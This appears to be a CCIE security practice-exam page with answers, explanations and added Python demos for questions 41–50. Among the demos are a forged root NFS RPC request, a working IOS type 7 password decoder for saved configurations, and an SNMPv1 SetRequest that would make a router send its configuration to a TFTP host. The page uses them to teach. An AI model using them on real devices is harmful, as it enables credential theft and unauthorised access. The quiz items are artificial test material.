350-018 : CCIE Pre-Qualification Test for Security

QUESTION 41 Why would you advise the new Cisco Highway trainee technician NOT to use the NFS protocol across a firewall or between security domains?

A. The security of the protocol is not stringent because file permissions can easily be modified in the requests.

B. Industry technicians do not understand NFS well, but it is actually appropriate to run across various security domains.

C. NFS is not secure because it does not have the concept of users and permissions.

D. It is UDP based, which makes its state difficult to track.

E. This protocol uses a range of ports, and firewalls have difficulty opening the proper entry points to allow traffic.

Answer: A

Explanation: (Not sure about this one.) NFS versions 2 and 3 normally run with AUTH_SYS (AUTH_UNIX) RPC credentials, in which the client simply asserts the UID and GID of the requester; the server applies file permissions to whatever identity the request carries, so any host that can reach an export can claim any user (root squashing only remaps UID 0). NFS is also built on ONC RPC: the portmapper and mountd can be queried remotely, for example to list the exports of a server such as 204.31.17.25 before allowing NFS mounting from outside in, which is why RPC services should be treated as insecure and used with caution. NFS is an application-layer file access protocol; the NFS service itself listens on port 2049 (TCP and UDP), while mountd, lockd and statd use dynamically assigned ports registered with the portmapper (port 111), so a firewall cannot express the policy with a single fixed port.
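The point behind answer A is that the identity NFS enforces permissions against is supplied by the client. The following is an added example, not code from the original page: it builds an ONC RPC CALL header with AUTH_SYS credentials (the format NFSv2/v3 use, RFC 5531) and decodes it the way a server or a firewall would see it. The program number, flavor numbers and field layout are the real ones; the xid, hostname "attacker" and the claimed uid/gid values are constructed for the demo.

```python
"""Added example (not from the original page): build and decode an ONC RPC
CALL header carrying AUTH_SYS (AUTH_UNIX) credentials, the scheme NFSv2/v3
normally use. The UID/GID fields are whatever the client puts on the wire,
which is why NFS file permissions are not a security boundary across a
firewall. Layout follows RFC 5531; numeric constants are real, the sample
values (xid, hostname, uids) are constructed for the demo."""
import struct

NFS_PROGRAM = 100003      # ONC RPC program number for NFS
NFS_V3 = 3
NFSPROC3_GETATTR = 1      # procedure 1 in NFS version 3
AUTH_NONE = 0
AUTH_SYS = 1              # a.k.a. AUTH_UNIX: client-asserted uid/gid
MSG_CALL = 0
RPC_VERSION = 2


def _xdr_opaque(data: bytes) -> bytes:
    """XDR variable-length opaque/string: 4-byte length, data, pad to 4."""
    pad = (-len(data)) % 4
    return struct.pack(">I", len(data)) + data + b"\x00" * pad


def auth_sys_body(stamp: int, machine: str, uid: int, gid: int, gids) -> bytes:
    """AUTH_SYS credential body (RFC 5531 appendix A). Nothing here is
    authenticated: the server simply believes uid/gid/gids."""
    body = struct.pack(">I", stamp) + _xdr_opaque(machine.encode())
    body += struct.pack(">II", uid, gid)
    body += struct.pack(">I", len(gids)) + b"".join(struct.pack(">I", g) for g in gids)
    return body


def rpc_call(xid: int, prog: int, vers: int, proc: int, cred_body: bytes) -> bytes:
    """Serialise the fixed RPC CALL header plus cred/verf (verf = AUTH_NONE)."""
    hdr = struct.pack(">IIIIII", xid, MSG_CALL, RPC_VERSION, prog, vers, proc)
    cred = struct.pack(">I", AUTH_SYS) + _xdr_opaque(cred_body)
    verf = struct.pack(">I", AUTH_NONE) + _xdr_opaque(b"")
    return hdr + cred + verf


def parse_call_identity(msg: bytes) -> dict:
    """What an NFS server (or a firewall/IDS) sees: decode the header and
    the AUTH_SYS credential, returning the identity the client claims."""
    xid, mtype, rpcvers, prog, vers, proc = struct.unpack_from(">IIIIII", msg, 0)
    if mtype != MSG_CALL or rpcvers != RPC_VERSION:
        raise ValueError("not an RPCv2 CALL")
    off = 24
    flavor, _clen = struct.unpack_from(">II", msg, off)
    off += 8
    if flavor != AUTH_SYS:
        return {"xid": xid, "prog": prog, "vers": vers, "proc": proc, "flavor": flavor}
    stamp, mlen = struct.unpack_from(">II", msg, off)
    off += 8
    machine = msg[off:off + mlen].decode()
    off += mlen + ((-mlen) % 4)
    uid, gid, ngids = struct.unpack_from(">III", msg, off)
    off += 12
    gids = list(struct.unpack_from(">%dI" % ngids, msg, off))
    return {"xid": xid, "prog": prog, "vers": vers, "proc": proc,
            "machine": machine, "uid": uid, "gid": gid, "gids": gids}


def forged_root_getattr(xid: int = 0x1234) -> bytes:
    """Constructed sample: a GETATTR call from an arbitrary host that simply
    claims uid 0 / gid 0. Only root_squash on the server turns this into
    nobody; nothing in the protocol proves the caller is root."""
    cred = auth_sys_body(stamp=0, machine="attacker", uid=0, gid=0, gids=[0])
    return rpc_call(xid, NFS_PROGRAM, NFS_V3, NFSPROC3_GETATTR, cred)


if __name__ == "__main__":
    print(parse_call_identity(forged_root_getattr()))
```

The decoded identity is exactly what the forging client chose; a server that exports to a wide address range has no way to tell this request from one sent by a legitimate root user, which is why NFS exports should stay inside one trust domain (or use Kerberos/RPCSEC_GSS).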

QUESTION 42 Exhibit: Which of the following crypto map and access list commands should be used to permit IPSec to handle multiple peers from Router A?

A.
  crypto map foo 10 ipsec-isakmp
   set peer B
   set peer C
   match address 101
   set trans bar
  access-list 101 permit ip 20.1.1.0 0.0.0.255 30.1.1.0 0.0.0.255
  access-list 101 permit ip 20.1.1.0 0.0.0.255 40.1.1.0 0.0.0.255

B.
  crypto map foo 10 ipsec-isakmp
   set peer B
   match address 101
   set trans bar
  crypto map foo 20 ipsec-isakmp
   set peer C
   match address 101
   set trans bar
  access-list 101 permit ip 20.1.1.0 0.0.0.255 30.1.1.0 0.0.0.255
  access-list 101 permit ip 20.1.1.0 0.0.0.255 40.1.1.0 0.0.0.255

C.
  crypto map foo 10 ipsec-isakmp
   set peer B
   match address 101
   set trans bar
  crypto map foo 20 ipsec-isakmp
   set peer C
   match address 102
   set trans bar
  access-list 101 permit ip 20.1.1.0 0.0.0.255 30.1.1.0 0.0.0.255
  access-list 102 permit ip 20.1.1.0 0.0.0.255 40.1.1.0 0.0.0.255

D.
  crypto map foo 10 ipsec-isakmp
   set peer B
   match address 101
   set trans bar
  crypto map foo 20 ipsec-isakmp
   set peer C
   match address 102
   set trans bar
  access-list 101 permit ip 20.1.1.0 0.0.0.255 any
  access-list 102 permit ip 20.1.1.0 0.0.0.255 any

E.
  crypto map foo 10 ipsec-isakmp
   set peer B
   match address 101
   set trans bar
  crypto map foo 10 ipsec-isakmp
   set peer C
   match address 102
   set trans bar
  access-list 101 permit ip 20.1.1.0 0.0.0.255 any
  access-list 102 permit ip 20.1.1.0 0.0.0.255 any

Answer: C

Explanation: Entries that share a crypto map name but have different sequence numbers form one crypto map, applied to the interface, and are evaluated in sequence order. Each peer needs its own entry with its own access list so that traffic to 30.1.1.0/24 is protected with peer B and traffic to 40.1.1.0/24 with peer C. In A, two set peer commands in one entry only make C a fallback for B. In B and D the same traffic matches both entries, so the first entry (peer B) is always used. In E the second entry reuses sequence number 10 and simply overwrites the first.

QUESTION 43 Which of the following aptly describes the Unix file /etc/shadow?

A. The Unix file /etc/shadow is referenced by login when the /etc/passwd file contains an asterisk in the third field.

B. The Unix file /etc/shadow is referenced by NIS when the /etc/passwd file contains a line with the first character of '+'.

C. The Unix file /etc/shadow is a place to store encrypted passwords without referencing the /etc/passwd file.

D. The Unix file /etc/shadow is a read-protected file referenced by login when the /etc/passwd file contains a special character in the second field.

Answer: C

Explanation: Most Unix systems use the shadow password scheme by default. The encrypted (hashed) password is not kept in /etc/passwd but in /etc/shadow, and /etc/passwd carries a placeholder, x, in the password field. /etc/passwd is readable by everyone because it maps user names to UIDs, whereas /etc/shadow is readable only by root, which keeps the hashes away from offline cracking. The shadow file also contains the password aging controls (last change, minimum and maximum age, warning and inactivity periods, expiry). A * or !! in the password field of /etc/shadow indicates an account that has no usable password and is therefore disabled.
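As an added example, not from the original page, the following parser reads /etc/shadow records (the shadow(5) layout named in the explanation above) and classifies each account the way login would: active, locked, disabled, or empty, plus whether password aging says the password is overdue for rotation. The sample file and its hash strings are constructed for the demo and are not real hashes.

```python
"""Added example, not from the original page: parse /etc/shadow records and
classify each account's password state. Field layout (name:hash:lastchg:min:
max:warn:inactive:expire:flag) is the documented shadow(5) format; the sample
lines below are constructed for the demo and the hashes are not real."""
from dataclasses import dataclass
from typing import List, Optional

SAMPLE_SHADOW = """\
root:$6$saltsalt$constructedhashvalueabcdefghijklmnopqrstuvwxyz0123456789:19700:0:99999:7:::
daemon:*:19000:0:99999:7:::
backup:!!:19000:0:99999:7:::
alice:$6$othersalt$anotherconstructedhashvalue0123456789abcdefghijklmnopq:19600:1:90:7:14::
svc:!$6$lockedsalt$lockedhashvaluedetailsconstructed0123456789abcdefghijk:19500:0:99999:7:::
guest::19000:0:99999:7:::
"""


@dataclass
class ShadowEntry:
    name: str
    hash: str
    last_change: Optional[int]   # days since epoch
    min_days: Optional[int]
    max_days: Optional[int]
    warn_days: Optional[int]
    inactive_days: Optional[int]
    expire_day: Optional[int]

    @property
    def state(self) -> str:
        """Interpret the password field the way login does."""
        if self.hash == "":
            return "empty (no password required)"
        if self.hash in ("*", "!!"):
            return "disabled (never had a usable password)"
        if self.hash.startswith("!"):
            return "locked (hash preserved, passwd -l)"
        return "active"

    def must_rotate(self, today: int) -> bool:
        """True if password aging says the password has expired."""
        if self.state != "active" or self.last_change is None or self.max_days is None:
            return False
        return self.max_days < 99999 and today > self.last_change + self.max_days


def _num(field: str) -> Optional[int]:
    return int(field) if field else None


def parse_shadow(text: str) -> List[ShadowEntry]:
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 9:
            raise ValueError(f"malformed shadow line: {line!r}")
        # f[8] is the reserved flag field and is ignored here
        entries.append(ShadowEntry(f[0], f[1], *(_num(x) for x in f[2:8])))
    return entries


def audit(text: str, today: int) -> dict:
    """Return name -> state, flagging empty passwords and overdue rotation."""
    report = {}
    for e in parse_shadow(text):
        state = e.state
        if e.must_rotate(today):
            state += ", rotation overdue"
        report[e.name] = state
    return report


if __name__ == "__main__":
    for name, state in audit(SAMPLE_SHADOW, today=19800).items():
        print(f"{name:8s} {state}")
```

Running it as root against the real file (read it and pass the text to audit) gives a quick picture of which accounts can actually log in; the "empty" case is the one worth alarming on, since it means no password is required at all.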

QUESTION 44 Exhibit: In a reorganization, OSPF areas are realigned. What changes would you advise the Cisco Highway trainee technician to make to the network and/or router configurations to make this a valid network design? (Choose all that apply.)

A. The trainee should configure Router B as an Area Border Router between Area 60 and Area 6.

B. The trainee should configure a virtual link between Area 60 and Area 0.

C. The trainee should install a serial line or other physical connection between devices in Area 60 and Area 0.

D. This design is not valid, and no changes can make it work.

Answer: B, C

Explanation: Every non-backbone OSPF area must be attached to area 0; an area that reaches the backbone only through another area cannot exchange inter-area routes. Either give Area 60 a physical connection to Area 0, or configure a virtual link across the transit area (the area virtual-link command on both ABRs), which logically extends the backbone to Area 60.

QUESTION 45 You are the Cisco Highway network administrator. Two remote LANs connected via a serial connection exchange routing updates via RIP. An alternate path exists with a higher hop count. When the serial link fails, users complain about the time it takes to fail over to the alternate path. How will you ameliorate this situation?

A. You could change the hop count on the alternate path to be the same cost.

B. You could reduce or disable the hold-down timer by making use of the timers basic command.

C. You could increase the bandwidth of the alternate serial connection.

D. You could configure a static route with the appropriate administrative distance via the alternate route.

Answer: B

Explanation: When the primary route is lost, RIP places it in hold-down (180 seconds by default) and ignores the worse-metric alternate route until the timer expires, which is what the users are waiting on. The timers basic update invalid holddown flush command shortens the hold-down (the defaults are 30, 180, 180 and 240 seconds); the same timers must be configured on every RIP router in the network.

QUESTION 46 Under which of the following circumstances will Network Address Translation (NAT) not work well?

A. With outbound HTTP when AAA authentication is involved.

B. With traffic that carries source and/or destination IP addresses in the application data stream.

C. With ESP tunnel mode IPSec traffic.

D. When PAT (Port Address Translation) is used on the same firewall.

E. When used in conjunction with static IP address assignment to some devices.

Answer: B

Explanation: NAT rewrites only the IP header (and, with PAT, the transport ports). A protocol that also carries IP addresses or ports inside the application payload, such as active-mode FTP, breaks unless the NAT device has an application-layer gateway that rewrites the payload and opens the corresponding pinhole as well. Of the IPsec options, it is AH, not ESP, that fundamentally does not work with NAT: the AH integrity check covers the outer IP header, which NAT changes, whereas ESP in tunnel mode does not protect the outer header (and NAT traversal wraps ESP in UDP), so C is a distractor.
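To make the embedded-address problem from answer B concrete, here is an added example that is not part of the original page. It uses active-mode FTP's PORT command (RFC 959) as the illustration, detects the mismatch NAT alone produces, and performs the rewrite and pinhole bookkeeping an application-layer gateway does. The addresses, ports and the sample command are constructed for the demo.

```python
"""Added example (not from the original page): why NAT breaks protocols that
carry IP addresses in the application payload, using active-mode FTP's PORT
command as the illustration (RFC 959). Without an ALG the server would try
to connect back to the private address the client wrote into the command;
the helper below does what a NAT ALG does: it rewrites the embedded address
and records the port mapping the firewall must open. Addresses, ports and
the sample command are constructed for the demo."""
import ipaddress
import re

PORT_RE = re.compile(r"^PORT (\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\r?\n?$")


def parse_port(cmd: str):
    """Return (ip, port) encoded in an FTP PORT command, or None."""
    m = PORT_RE.match(cmd)
    if not m:
        return None
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    if max(h1, h2, h3, h4, p1, p2) > 255:
        return None
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def embedded_address_mismatch(cmd: str, packet_src_ip: str) -> bool:
    """True when the address inside the payload differs from the packet's
    (already translated) source: the symptom NAT without an ALG produces."""
    parsed = parse_port(cmd)
    return parsed is not None and parsed[0] != packet_src_ip


def alg_rewrite(cmd: str, inside_ip: str, outside_ip: str, outside_port: int):
    """NAT ALG behaviour: if the PORT command names the inside host, replace
    it with the translated address/port and return the new command plus the
    (outside_ip, outside_port) -> (inside_ip, inside_port) mapping the
    firewall must install so the server's data connection is accepted."""
    parsed = parse_port(cmd)
    if parsed is None or parsed[0] != inside_ip:
        return cmd, None
    ip = ipaddress.IPv4Address(outside_ip)
    new = ("PORT " + ",".join(str(b) for b in ip.packed)
           + f",{outside_port // 256},{outside_port % 256}\r\n")
    mapping = ((outside_ip, outside_port), (inside_ip, parsed[1]))
    return new, mapping


if __name__ == "__main__":
    cmd = "PORT 10,1,1,5,7,208\r\n"   # constructed: inside client 10.1.1.5:2000
    print(embedded_address_mismatch(cmd, "198.51.100.7"))      # NAT alone: server sees 10.1.1.5
    print(alg_rewrite(cmd, "10.1.1.5", "198.51.100.7", 40000))  # what the ALG sends instead
```

The same pattern (parse the payload, rewrite the embedded endpoint, open a matching pinhole) is what the IOS fixup/inspect features do for FTP, H.323 and similar protocols; without it, the return data connection is addressed to an unroutable private address and simply never arrives.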

QUESTION 47 Inside addresses = 131.108.0.0
Outside global addresses = 198.108.10.0
Serial 0 is connected to the outside world.
Which of the following Network Address Translation (NAT) configurations is correct given the above information?

A.
  ip nat pool CCIE-198 198.108.10.0 198.108.10.255 prefix-length 24
  ip nat inside source list 1 pool CCIE-198
  interface serial 0
   ip address 131.108.1.1 255.255.255.0
   ip nat outside
  interface Ethernet0
   ip address 198.108.10.1 255.255.255.0
   ip nat inside
  access-list 1 permit 131.108.0.0 0.0.255.255

B.
  ip nat pool CCIE-198 198.108.10.0 198.108.10.255 prefix-length 24
  ip nat inside source list 1 pool CCIE-198
  interface serial 0
   ip address 198.108.10.1 255.255.255.0
   ip nat outside
  interface Ethernet0
   ip address 131.108.1.1 255.255.255.0
   ip nat inside
  access-list 1 permit 131.108.0.0 0.0.255.255

C.
  ip nat pool CCIE-198 198.108.10.0 198.108.10.255 prefix-length 24
  ip nat inside source list 1 pool CCIE-198
  interface serial 0
   ip address 198.108.10.1 255.255.255.0
   ip nat outside
  interface Ethernet0
   ip address 131.108.1.1 255.255.255.0
   ip nat inside
  access-list 1 permit 198.108.10.0 0.0.0.255

D.
  ip nat pool CCIE-131 131.108.1.0 131.108.1.255 prefix-length 24
  ip nat inside source list 1 pool CCIE-131
  interface serial 0
   ip address 198.108.10.1 255.255.255.0
   ip nat inside
  interface Ethernet0
   ip address 131.108.1.1 255.255.255.0
   ip nat outside
  access-list 1 permit 198.108.10.0 0.0.0.255

Answer: B

Explanation: ip nat inside source list 1 pool CCIE-198 translates the source address of packets that arrive on an inside interface and match access list 1 (the inside addresses, 131.108.0.0/16) to an address taken from pool CCIE-198 (the outside global addresses, 198.108.10.0/24). Only B marks Serial 0, the outside link holding 198.108.10.1, as ip nat outside and Ethernet0 (131.108.1.1) as ip nat inside while permitting the inside range in the access list. A swaps the interface addresses, C permits the outside range instead of the inside one, and D builds the pool from inside addresses and reverses the inside/outside roles. (In practice the pool should also exclude 198.108.10.0, 198.108.10.255 and the serial interface's own address, 198.108.10.1.)

QUESTION 48 The newly appointed Cisco Highway trainee technician wants to know what PFS (Perfect Forward Secrecy) requires. What will your reply be?

A. AH

B. ESP

C. Another Diffie-Hellman exchange when an SA has expired

D. Triple DES

E. A discrete client

F. All of the above

Answer: C

Explanation:
  crypto map mymap 10 ipsec-isakmp
   set pfs group2
This specifies that PFS should be used whenever a new security association is negotiated for crypto map entry "mymap 10": the 1024-bit Diffie-Hellman prime modulus group (group 2) is used in a fresh Diffie-Hellman exchange each time a new SA is negotiated. Without PFS the keys of every IPsec SA are derived from the single phase 1 (ISAKMP) shared secret, so compromise of that secret exposes all of them; with PFS each SA also depends on an ephemeral DH secret that is discarded after use.
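The explanation above says what PFS adds; the following added example, not from the original page, shows it in the key derivation. It follows the IKEv1 Quick Mode KEYMAT formula of RFC 2409 section 5.5 (HMAC-SHA1 as the prf) and compares what an attacker who later obtains the phase 1 secret SKEYID_d can recover from a captured exchange with and without PFS. A small toy prime stands in for the 1024-bit group 2 modulus so the code runs instantly; the nonces, SPIs and the phase 1 secret are constructed for the demo.

```python
"""Added example, not from the original page: what PFS buys you in IKEv1
Quick Mode. Key material for each IPsec SA is derived as in RFC 2409 s5.5:
without PFS from the phase-1 secret SKEYID_d plus nonces/SPI, with PFS from
a fresh Diffie-Hellman secret g^xy as well. A small safe prime stands in
for the 1024-bit MODP group ("group2" in the exam answer) so the code runs
instantly; the derivation logic is the same. Nonces, SPIs and the phase-1
secret are constructed for the demo."""
import hashlib
import hmac
import secrets

# Toy DH group for illustration only: 2^127-1 is prime, generator 2.
# Real IOS "set pfs group2" uses the 1024-bit MODP prime of RFC 2409.
P = (1 << 127) - 1
G = 2
PROTO_ESP = b"\x03"   # PROTO_IPSEC_ESP in the IKE DOI


def prf(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.sha1).digest()


def dh_keypair():
    x = secrets.randbelow(P - 2) + 1
    return x, pow(G, x, P)


def keymat(skeyid_d: bytes, spi: bytes, ni: bytes, nr: bytes, gxy: bytes = b"") -> bytes:
    """KEYMAT = prf(SKEYID_d, [g(qm)^xy |] protocol | SPI | Ni_b | Nr_b)."""
    return prf(skeyid_d, gxy + PROTO_ESP + spi + ni + nr)


def quick_mode(skeyid_d: bytes, pfs: bool):
    """Run one Quick Mode between initiator and responder; return the SA
    key both sides derived and the values an eavesdropper could capture."""
    ni, nr, spi = secrets.token_bytes(16), secrets.token_bytes(16), secrets.token_bytes(4)
    capture = {"spi": spi, "ni": ni, "nr": nr}
    if not pfs:
        return keymat(skeyid_d, spi, ni, nr), capture
    x, gx = dh_keypair()          # initiator's ephemeral DH
    y, gy = dh_keypair()          # responder's ephemeral DH
    capture.update({"gx": gx, "gy": gy})   # only the public values cross the wire
    shared_i = pow(gy, x, P).to_bytes(16, "big")
    shared_r = pow(gx, y, P).to_bytes(16, "big")
    if shared_i != shared_r:
        raise RuntimeError("DH mismatch")
    # x and y are discarded after use; that is what makes the SA forward-secret
    return keymat(skeyid_d, spi, ni, nr, shared_i), capture


def attacker_recover(skeyid_d: bytes, capture: dict):
    """Attacker who later obtains SKEYID_d and holds the captured exchange.
    Without PFS the SA key falls out directly; with PFS the attacker has
    only g^x and g^y and would have to solve the discrete log."""
    if "gx" in capture:
        return None
    return keymat(skeyid_d, capture["spi"], capture["ni"], capture["nr"])


def demo(pfs: bool) -> bool:
    """True if a later SKEYID_d compromise recovers the SA key."""
    skeyid_d = secrets.token_bytes(20)
    sa_key, capture = quick_mode(skeyid_d, pfs)
    return attacker_recover(skeyid_d, capture) == sa_key


if __name__ == "__main__":
    print("no PFS: SA key recovered =", demo(pfs=False))
    print("PFS:    SA key recovered =", demo(pfs=True))
```

The cost of PFS is one extra modular exponentiation per rekey on each peer, which is why it is optional per crypto map entry; for any SA carrying data that must stay confidential after the ISAKMP SA's lifetime, that cost is worth paying.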

QUESTION 49 Which of the following services would you advise the new Cisco Highway trainee technician to enable on IOS firewall devices?

A. SNMP with community string public.

B. TCP small services.

C. UDP small services.

D. Password encryption.

E. CDP.

F. All of the above.

Answer: D

Explanation: To encrypt passwords in the configuration, use the service password-encryption global configuration command. The TCP and UDP small services (echo, discard, chargen, daytime) are controlled by the service tcp-small-servers and service udp-small-servers commands and should stay disabled (no service tcp-small-servers, no service udp-small-servers); CDP should be disabled on untrusted interfaces or globally (no cdp run), and the well-known community string public should never be configured. Note that service password-encryption only applies the reversible type 7 encoding, which protects against casual viewing of a displayed configuration and nothing more; use enable secret, which stores a one-way hash, for the enable password.
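The caveat in the explanation above, that type 7 is reversible, is easy to demonstrate. The following is an added example, not code from the original page: it implements the type 7 encoding and decoding (a fixed-key XOR whose key has long been public), and walks a saved configuration recovering every type 7 secret. The key constant is the well-known one; the sample configuration is constructed for the demo.

```python
"""Added example (not part of the original page): the IOS type 7 encoding
that `service password-encryption` applies. It is a Vigenere-style XOR
against a fixed, publicly known key, so anyone who can read the running
config can reverse it; that is the caveat behind answer D. The key constant
below is the well-known one; the sample config strings are constructed."""

TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def type7_decrypt(enc: str) -> str:
    """'0822455D0A16' -> 'cisco'. The first two characters are the decimal
    offset into the key; the rest is hex, one byte per plaintext character."""
    if len(enc) < 2 or len(enc) % 2:
        raise ValueError("type 7 string must be an even-length hex string")
    seed = int(enc[:2], 10)
    data = bytes.fromhex(enc[2:])
    out = bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, b in enumerate(data))
    return out.decode("ascii")


def type7_encrypt(plain: str, seed: int = 8) -> str:
    """Produce the encoded form IOS would store (IOS picks seeds 0..15)."""
    if not 0 <= seed <= 15:
        raise ValueError("seed must be 0..15")
    data = plain.encode("ascii")
    enc = bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, b in enumerate(data))
    return f"{seed:02d}" + enc.hex().upper()


def recover_from_config(config: str) -> dict:
    """Walk a saved config and return every type 7 secret in the clear,
    the way an attacker holding 'show running-config' output would."""
    found = {}
    for line in config.splitlines():
        tok = line.split()
        for i, t in enumerate(tok[:-1]):
            if t == "7" and tok[i + 1][:2].isdigit():
                found[line.strip()] = type7_decrypt(tok[i + 1])
    return found


# Constructed sample configuration (not from a real device)
SAMPLE_CONFIG = """\
service password-encryption
username admin password 7 0822455D0A16
line vty 0 4
 password 7 105D0C1A171206
"""

if __name__ == "__main__":
    for line, secret in recover_from_config(SAMPLE_CONFIG).items():
        print(f"{line:45s} -> {secret}")
```

Because the encoding is keyed by a constant, configuration backups, TFTP servers and ticket attachments containing type 7 strings must be treated as containing cleartext passwords.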

QUESTION 50 Which of the following statements regarding SNMPv1 community strings is valid?

A. SNMPv1 community strings are encrypted across the wire.

B. SNMPv1 community strings can be used to gain unauthorized access to a device if the read-write string is known.

C. SNMPv1 community strings are always the same for reading and writing data.

D. SNMPv1 community strings are used to define the community of devices in a single VLAN.

Answer: B

Explanation: SNMPv1 carries the community string in cleartext in every packet, and it is the only authentication the protocol has. With the read-write string an attacker can change the configuration of the device through SNMP set operations, which on IOS includes copying the configuration to or from a TFTP server, so a sniffed, guessed or default read-write string amounts to remote administrative access. Use distinct read-only and read-write strings, restrict SNMP access with an access list, or move to SNMPv3 with authentication and privacy.
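To show what "cleartext on the wire" means in practice, here is an added example that is not part of the original page. It encodes an SNMPv1 message in BER (the RFC 1157 structure) and then parses the community string, PDU type and OIDs back out of the raw bytes, which is all a sniffer on the path has to do. The community strings, request IDs and target OIDs are constructed for the demo; the writeNet OID used in the SetRequest is the OLD-CISCO-SYS-MIB object a read-write community lets an attacker use to push the configuration to a TFTP server.

```python
"""Added example, not from the original page: encode an SNMPv1 request and
then pull the community string back out of the raw bytes, the way a sniffer
on the path would. SNMPv1 is plain BER (RFC 1157); nothing is encrypted, so
the read-only and read-write strings cross the wire verbatim. Community
strings, request IDs and the target OIDs below are constructed for the demo."""

PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest",
             0xA2: "GetResponse", 0xA3: "SetRequest"}


def _ber_len(n: int) -> bytes:
    if n < 128:
        return bytes([n])
    b = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(b)]) + b


def tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + _ber_len(len(body)) + body


def ber_int(v: int) -> bytes:
    """Non-negative INTEGER, with a leading zero byte when the high bit is set."""
    return tlv(0x02, v.to_bytes(v.bit_length() // 8 + 1, "big"))


def ber_oid(oid: str) -> bytes:
    parts = [int(p) for p in oid.split(".")]
    body = bytearray([40 * parts[0] + parts[1]])
    for p in parts[2:]:
        chunk = [p & 0x7F]
        p >>= 7
        while p:                      # base-128 with continuation bits
            chunk.append((p & 0x7F) | 0x80)
            p >>= 7
        body += bytes(reversed(chunk))
    return tlv(0x06, bytes(body))


def decode_oid(body: bytes) -> str:
    out, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            out.append(val)
            val = 0
    return ".".join(map(str, out))


def read_tlv(buf: bytes, off: int):
    """Return (tag, value, next_offset) for the TLV starting at off."""
    tag, length, off = buf[off], buf[off + 1], off + 2
    if length & 0x80:
        n = length & 0x7F
        length, off = int.from_bytes(buf[off:off + n], "big"), off + n
    return tag, buf[off:off + length], off + length


def build_snmpv1(community: str, pdu_tag: int, request_id: int, oid: str,
                 value: str = None) -> bytes:
    """SNMPv1 Message ::= SEQUENCE { version (0), community, PDU }."""
    val = tlv(0x05, b"") if value is None else tlv(0x04, value.encode())
    varbinds = tlv(0x30, tlv(0x30, ber_oid(oid) + val))
    pdu = tlv(pdu_tag, ber_int(request_id) + ber_int(0) + ber_int(0) + varbinds)
    return tlv(0x30, ber_int(0) + tlv(0x04, community.encode()) + pdu)


def parse_snmpv1(pkt: bytes) -> dict:
    """What a sniffer sees: version, cleartext community, PDU type, OIDs."""
    tag, msg, _ = read_tlv(pkt, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, ver, off = read_tlv(msg, 0)
    _, community, off = read_tlv(msg, off)
    pdu_tag, pdu, _ = read_tlv(msg, off)
    _, rid, off = read_tlv(pdu, 0)
    _, _, off = read_tlv(pdu, off)          # error-status
    _, _, off = read_tlv(pdu, off)          # error-index
    _, vbl, _ = read_tlv(pdu, off)
    oids, o = [], 0
    while o < len(vbl):
        _, vb, o = read_tlv(vbl, o)
        _, oid, _ = read_tlv(vb, 0)
        oids.append(decode_oid(oid))
    return {"version": int.from_bytes(ver, "big"), "community": community.decode(),
            "pdu": PDU_NAMES.get(pdu_tag, hex(pdu_tag)),
            "request_id": int.from_bytes(rid, "big"), "oids": oids}


if __name__ == "__main__":
    # Constructed traffic: a read with the RO string, then a write with the RW
    # string against writeNet.<tftp-ip> (OLD-CISCO-SYS-MIB), which makes the
    # router send its configuration to that TFTP host.
    get = build_snmpv1("public", 0xA0, 1234, "1.3.6.1.2.1.1.5.0")
    setreq = build_snmpv1("private", 0xA3, 1235,
                          "1.3.6.1.4.1.9.2.1.55.192.0.2.10", "running-config")
    for pkt in (get, setreq):
        print(parse_snmpv1(pkt), "| community bytes visible:",
              b"public" in pkt or b"private" in pkt)
```

The parser deliberately stops at the fields an attacker cares about; a full decoder would also walk the values, but the community string is already recovered before the PDU is even examined, which is the whole problem with SNMPv1 and v2c.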
